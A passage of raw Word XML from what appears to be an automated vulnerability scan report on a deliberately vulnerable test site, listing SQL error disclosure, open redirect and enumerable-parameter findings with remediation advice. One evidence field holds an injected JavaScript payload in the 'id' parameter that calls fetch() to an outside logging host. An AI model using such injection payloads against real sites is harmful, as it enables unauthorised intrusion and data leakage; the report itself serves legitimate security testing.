        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="350D588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2722886" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="008979AB"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027A25F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C0B2BB5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Parameters</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3398A837"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Query:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Submit=Submit</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>id=\"-fetch('https://not-ptt-logger.net/l/taaIqJBO4h/?id=11385992114545625403'.replace('not-ptt-logger.net','ptt-logger.net'),{mode:'no-cors'})}//</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Headers:</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>User-Agent=Mozilla/5.0 (Windows NT 10.0; Win64...</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6BF3B25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30F425C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1B717DC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Error message </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>You have an error in your SQL syntax</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> found in:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>&gt;Fatal error&lt;/b&gt;:  Uncaught mysqli_sql_exception: You have an error in your SQL syntax; check the manual that corresponds to your MariaD</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId90">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7F0D3BB2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="39B80D2E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DE7EBE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that the target application does not properly handle exceptional conditions, leading to error messages that reveal sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B1217B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145E3916" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that an attacker may use the contents of error messages to help launch another, more focused attack. For example, an attempt to exploit a path traversal weakness (CWE-22) might yield the full pathname of the installed application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC0CCD1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687E673C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>It is recommended treating all exceptions of the application flow. Ensure that error messages only contain minimal details.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="544B45A2"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5BFA68E5"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66BB33B6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="36BBC17B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4B3E0057" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3096F188" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="29BCCE2B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId91">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-209</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="43079948" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="249FF6B4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2017</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27C81CDA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId92">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A6 - Security Misconfiguration</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="688E687F" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="159040F1" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A181299" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId93">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A4 - Insecure Design</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3A4BC613" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FA9D00" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="989898"/>
        </w:rPr>
        <w:t>✘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3465B12A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C4A5985" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.12 Open Redirect </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="768F9313" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0B59252D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75F3EB5D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="29993B95" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7D442BA9" wp14:editId="3B4BEBDB">
                  <wp:extent cx="1397000" cy="1397000"/>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26ABB1C1" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D0A38D5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="0C334A07" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="23CF1055"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016"/>
        <w:gridCol w:w="6834"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6BB4434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9B250D6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="28D41848"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94">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5F5FDCB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D8581FC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="05D88B2C"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1536D17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BA442FB" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67AA8ED8"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redirect</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5B0F23B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30E38F0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03AB3B50"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The server redirects to the URL </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>https://pentest-tools.com/file.txt</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> when it is injected in the </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>redirect query parameter</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId95">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6EDABB8F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:p w14:paraId="585A5C1A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D8C34BA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We noticed that the target application's backend server directly incorporates user input into URLs that it uses for redirection without adequate validation. This behavior creates an open redirect vulnerability, which can lead users to arbitrary, potentially malicious domains.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CF90E6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F68C6B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk is that attackers may use open redirect to redirect users to arbitrary domains of their choice. This can be used in phishing attacks, as targets will receive a trusted URL and might not notice the subsequent redirect.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24759594" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF804CA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t xml:space="preserve">If possible, the application should not incorporate user input into URLs. Instead, use direct links to redirect towards the target page. If, however, this is not possible, you should only accept relative URLs as input. To check that the input represents a relative URL, make sure that it starts with a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>"/"</w:t>
      </w:r>
      <w:r>
        <w:t>. If this check passes, prepend your domain name to it, and use this final result as the redirection URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDC91CC"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28D1AFDD"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ED225D6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4F025DB4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4D0E75E0" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F54733A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35D5258E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId96">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>CWE-601</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1D1EE27A" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3ECD028B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>OWASP Top 10 - 2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="59E7651D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
            <w:hyperlink r:id="rId97">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>A1 - Broken Access Control</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="44E32D19" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A45FC8F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F6EA0B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="207D77A6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">4.1.13 Enumerable Parameter </w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5655FE39" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0863D202" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="787C3AC4" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>https://pentest-ground.com:4280/</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="50E75934" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6AA3F4F7" wp14:editId="2EF9A1B7">
                  <wp:extent cx="1397000" cy="139700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0FF9006C" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C06C4D9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="6ABA8123" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5E91E781"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009"/>
        <w:gridCol w:w="6841"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="5F3AE62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E6B2984" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="102464C7"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98">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="060415E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19B76E6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="742D3982"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2B819FD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5C92B7D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71963BD0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:cnfStyle w:val="000000000000" w:firstRow="0" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
            </w:pPr>
            <w:r>
              <w:t>id</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="7EB6191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6DE9A28" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44CCC533"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The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>id query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> appears to contain an enumerable numeric part. We modified its initial value </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and the two responses were </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>96%</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> similar. The parameter may introduce an Insecure Direct Object Reference (IDOR) vulnerability.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId99">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>Request / Response</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2AEE0A02" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayFirstColumn"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3016"/>
        <w:gridCol w:w="6834"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1B930A6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902C978" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AF7B2CC"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00">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/low.php</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4893423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30330DD" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Method</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C767C81"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6315556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45F5021" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Vulnerable Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6791E544"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redirect</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>(Query Parameter)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="6585134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479C88D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>Evidence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="6240" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0F0FA04B"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The </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>redirect query parameter</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> appears to contain an enumerable numeric part. We modified its initial value </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>info.php?id=2</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>info.php?id=1</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> and the two responses were </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>96%</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> similar. The parameter may introduce an Insecure Direct Object Reference (IDOR) vulnerability.</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:hyperlink r:id="rId101">
              <w:r w:rsidR="00DD22C7">
                <w:rPr>
